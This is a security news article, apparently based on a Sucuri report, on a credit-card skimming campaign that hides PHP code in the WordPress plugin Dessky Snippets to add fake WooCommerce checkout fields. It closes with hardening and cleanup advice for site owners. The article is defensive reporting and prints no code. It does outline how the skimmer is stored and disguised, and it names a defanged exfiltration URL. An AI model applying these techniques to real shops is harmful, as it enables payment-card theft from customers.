On May 11, 2024, Sucuri identified a malicious campaign targeting WordPress websites through the exploitation of a lesser-known plugin called Dessky Snippets. With over 200 active installations, this plugin allows users to add custom PHP code to their sites. However, threat actors have manipulated this feature to inject malicious PHP code designed to harvest credit card data. The campaign highlights a significant security risk, as the injected code compromises the checkout process on WooCommerce sites by adding unauthorized fields to collect sensitive information such as names, addresses, credit card numbers, expiry dates, and CVV numbers. This stolen data is then exfiltrated to a remote URL. The attack method underscores the broader trend of cybercriminals exploiting legitimate plugins to conduct sophisticated attacks, emphasizing the need for WordPress site administrators to maintain strong security practices. Regular updates, stringent access controls, and continuous monitoring are essential to safeguard against such vulnerabilities. This incident also illustrates the critical importance of securing all plugins, regardless of their popularity, to prevent unauthorized access and data breaches.

Details of the Campaign

Exploitation of the Dessky Snippets Plugin

Attackers gain administrator access through known vulnerabilities in WordPress plugins or by using easily guessable credentials. Once they have access, they install or manipulate the Dessky Snippets plugin to insert server-side PHP credit card skimming malware.

Malicious Code Injection

The inserted malicious code is stored in the dnsp_settings option within the WordPress wp_options table. This code is designed to modify the WooCommerce checkout process by manipulating the billing form. It injects additional fields into the form, requesting sensitive credit card details such as names, addresses, credit card numbers, expiry dates, and CVV numbers. These details are then exfiltrated to the URL hxxps://2of[.]cc/wp-content/.

Autocomplete Attribute Disabled

An important aspect of this attack is the manual disabling of the autocomplete feature on the fake checkout form. By setting autocomplete=”off”, the attackers reduce the likelihood that browsers will warn users about entering sensitive information. This also ensures that the fields remain blank until manually filled out by users, making them appear as regular, necessary inputs and reducing suspicion.

Previous Instances of Similar Attacks

WPCode Code Snippet Plugin Abuse

Last month, Sucuri reported a case where legitimate code snippet plugins were exploited by attackers who misused the WPCode code snippet plugin. This exploitation involved injecting malicious JavaScript code into WordPress sites, which redirected visitors to VexTrio domains. The incident underscores the vulnerability of even widely-used plugins to malicious activity. Attackers taking advantage of these plugins highlights the critical need for regular updates, vigilant monitoring, and comprehensive security practices for WordPress site administrators. This type of attack not only disrupts user experience but also increases the risk of exposing visitors to further cyber threats. The event serves as a reminder of the importance of maintaining strong security measures to protect website integrity and user trust against the growing sophistication of cyber threats targeting popular web platforms.

Sign1 Malware Campaign

In another campaign known as Sign1, more than 39,000 WordPress sites were compromised through malicious JavaScript injections exploiting the Simple Custom CSS and JS plugin. This attack redirected users to scam sites, emphasizing a disturbing trend of abusing legitimate plugins for nefarious purposes. The widespread infection underscores the vulnerabilities inherent in third-party plugins and the increasing sophistication of cyber threats targeting WordPress platforms. The malicious JavaScript code embedded in the sites not only disrupted user experience but also posed significant security risks by potentially leading visitors to phishing or malware-laden pages. This incident highlights the urgent need for WordPress site administrators to be vigilant about plugin security, ensuring regular updates, and conducting thorough security audits to protect against such pervasive threats. As cybercriminals continue to evolve their tactics, the importance of robust security measures and proactive monitoring becomes ever more critical in safeguarding website integrity and user data.

Recommendations for WordPress Site Owners

Given the increasing sophistication of these attacks, particularly targeting e-commerce functionalities, WordPress site owners should take the following precautions:

1. Keep Sites and Plugins Updated: Regularly update WordPress core, themes, and plugins to patch known vulnerabilities.
2. Use Strong Passwords: Implement strong, unique passwords to prevent brute-force attacks.
3. Regular Site Audits: Conduct frequent audits of the site to detect signs of malware or unauthorized changes.
4. Monitor for Unauthorized Plugins: Regularly check for any unauthorized plugin installations or modifications.

Remediation Steps for Compromised WordPress Sites

1. Isolate the Site: Take the site offline to prevent further damage and protect users.
2. Backup the Site: Create a complete backup of the site, including the database and all files.
3. Remove Malicious Code: Use security plugins to scan for malicious code and manually inspect and clean infected files.
4. Update All Software: Update WordPress core, plugins, and themes to their latest versions.
5. Strengthen Security: Change all passwords to strong, unique ones and enable two-factor authentication (2FA).
6. Secure Configuration and Hardening: Remove unused plugins and themes, follow security best practices, and configure security plugins.
7. Monitor and Audit: Schedule regular security scans and log monitoring to detect and respond to suspicious activity.